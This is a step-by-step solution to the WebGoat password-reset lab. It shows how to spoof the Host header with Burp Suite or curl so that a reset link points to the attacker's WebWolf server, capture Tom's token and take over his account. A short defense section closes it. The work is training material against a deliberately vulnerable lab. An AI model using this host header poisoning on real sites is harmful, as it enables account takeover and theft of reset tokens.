===================================================================
PASSWORD RESET LINK HIJACKING - COMPLETE SOLUTION
===================================================================

CHALLENGE: Steal Tom's password reset token and change his password

TARGET: tom@webgoat-cloud.org
WEBWOLF: http://localhost:9090 (attacker-controlled landing page)
WEBGOAT: http://192.168.254.112:8001

===================================================================
ATTACK OVERVIEW
===================================================================

The vulnerability is in the Host Header Injection attack:

1. Request password reset for Tom (tom@webgoat-cloud.org)
2. INTERCEPT the request with Burp Suite
3. CHANGE the Host header from localhost:8080 to localhost:9090
4. Tom receives email with reset link pointing to YOUR WebWolf server
5. Tom clicks the link (he always does!)
6. WebWolf captures the reset token
7. Use the token to reset Tom's password
8. Login as Tom

===================================================================
STEP-BY-STEP SOLUTION
===================================================================

STEP 1: SET UP BURP SUITE PROXY
--------------------------------

1. Open Burp Suite Community Edition

2. Go to Proxy > Options
   - Check "Intercept is on"
   - Verify proxy is running on 127.0.0.1:8080

3. Configure Browser Proxy:
   - Firefox: Settings > Network Settings > Manual Proxy
     HTTP Proxy: 127.0.0.1
     Port: 8080
     Check "Use this proxy for all protocols"
   
   OR use FoxyProxy extension for easy switching

4. Import Burp's CA Certificate:
   - In Burp: Proxy > Options > Import/Export CA Certificate
   - In Browser: about:preferences#privacy > View Certificates
   - Import the certificate


STEP 2: ACCESS WEBWOLF
-----------------------

1. Open WebWolf in browser:
   http://localhost:9090/WebWolf/login

2. Login with your WebGoat credentials

3. Go to "Incoming requests" or "Mail" section
   - This is where you'll capture Tom's reset link


STEP 3: REQUEST PASSWORD RESET (WITH INTERCEPTION)
---------------------------------------------------

1. In Burp Suite: Turn on "Intercept is on"

2. In WebGoat Password Reset page:
   - Enter email: tom@webgoat-cloud.org
   - Click "Submit" or "Forgot your password"

3. Burp will INTERCEPT the request. You'll see something like:

   POST /WebGoat/PasswordReset/reset/reset-password HTTP/1.1
   Host: localhost:8080
   Content-Type: application/x-www-form-urlencoded
   
   email=tom@webgoat-cloud.org

4. MODIFY the Host header:
   Change: Host: localhost:8080
   To:     Host: localhost:9090

   The modified request should look like:
   
   POST /WebGoat/PasswordReset/reset/reset-password HTTP/1.1
   Host: localhost:9090
   Content-Type: application/x-www-form-urlencoded
   
   email=tom@webgoat-cloud.org

5. Click "Forward" in Burp

6. Turn off "Intercept" in Burp


STEP 4: CAPTURE TOKEN IN WEBWOLF
---------------------------------

1. Go to WebWolf: http://localhost:9090

2. Navigate to "Incoming requests" section

3. Tom will click the link automatically!

4. You should see a request like:
   GET /landing?token=abc123def456... 
   
5. COPY the token value (the long string after token=)


STEP 5: RESET TOM'S PASSWORD
-----------------------------

1. Use the captured token to reset Tom's password

2. Make a request (use Burp Repeater, curl, or browser console):

   POST /WebGoat/PasswordReset/reset/reset-password/{TOKEN}
   
   Body: newPassword=MyNewPassword123

3. Or use the password reset form with the token in the URL


STEP 6: LOGIN AS TOM
---------------------

1. Go to WebGoat login page

2. Login with:
   Username: tom
   Password: MyNewPassword123 (whatever you set)

3. Challenge completed!


===================================================================
ALTERNATIVE: USING CURL
===================================================================

If browsers don't work, use command line:

Step 1: Request reset with modified host
-----------------------------------------
curl -X POST http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password \
  -H "Host: localhost:9090" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "email=tom@webgoat-cloud.org"


Step 2: Check WebWolf for token
---------------------------------
Open: http://localhost:9090/WebWolf/requests

Look for the token parameter


Step 3: Reset password with token
----------------------------------
curl -X POST http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password/{TOKEN} \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "newPassword=MyNewPassword123"


===================================================================
TROUBLESHOOTING
===================================================================

Q: WebWolf not accessible
A: Make sure WebWolf is running on port 9090
   Check Docker: docker ps | grep webwolf

Q: Burp not intercepting
A: Check proxy settings in browser
   Verify Burp Proxy is listening on 127.0.0.1:8080

Q: Token not appearing in WebWolf
A: Make sure you changed Host header to localhost:9090
   Check WebWolf "Incoming requests" section

Q: Can't reset password with token
A: Token might be expired (time-limited)
   Try the whole process again quickly

Q: ZAP doesn't work
A: Challenge says ZAP has issues, use Burp Suite instead


===================================================================
KEY CONCEPTS
===================================================================

VULNERABILITY: Host Header Injection
- Server trusts the Host header in HTTP request
- Used to generate password reset links
- Attacker can inject their own host

ATTACK FLOW:
1. Attacker requests reset for victim@email.com
2. Attacker modifies Host header to attacker.com
3. Email sent to victim with link: attacker.com/reset?token=xyz
4. Victim clicks link
5. Token sent to attacker's server
6. Attacker uses token to reset password

PROPER DEFENSE:
- Don't trust Host header for generating URLs
- Use configured server URL from settings
- Validate Host header against whitelist
- Use signed tokens that bind to IP/session


===================================================================
QUICK REFERENCE - URLS
===================================================================

WebGoat:  http://192.168.254.112:8001/WebGoat/start.mvc
WebWolf:  http://localhost:9090/WebWolf/login

Password Reset Endpoint:
  POST /WebGoat/PasswordReset/reset/reset-password

Burp Proxy:
  127.0.0.1:8080


===================================================================
FILES TO CREATE
===================================================================

I'll create:
1. Burp Suite configuration guide
2. Automated curl script
3. PowerShell automation script
4. Step-by-step checklist
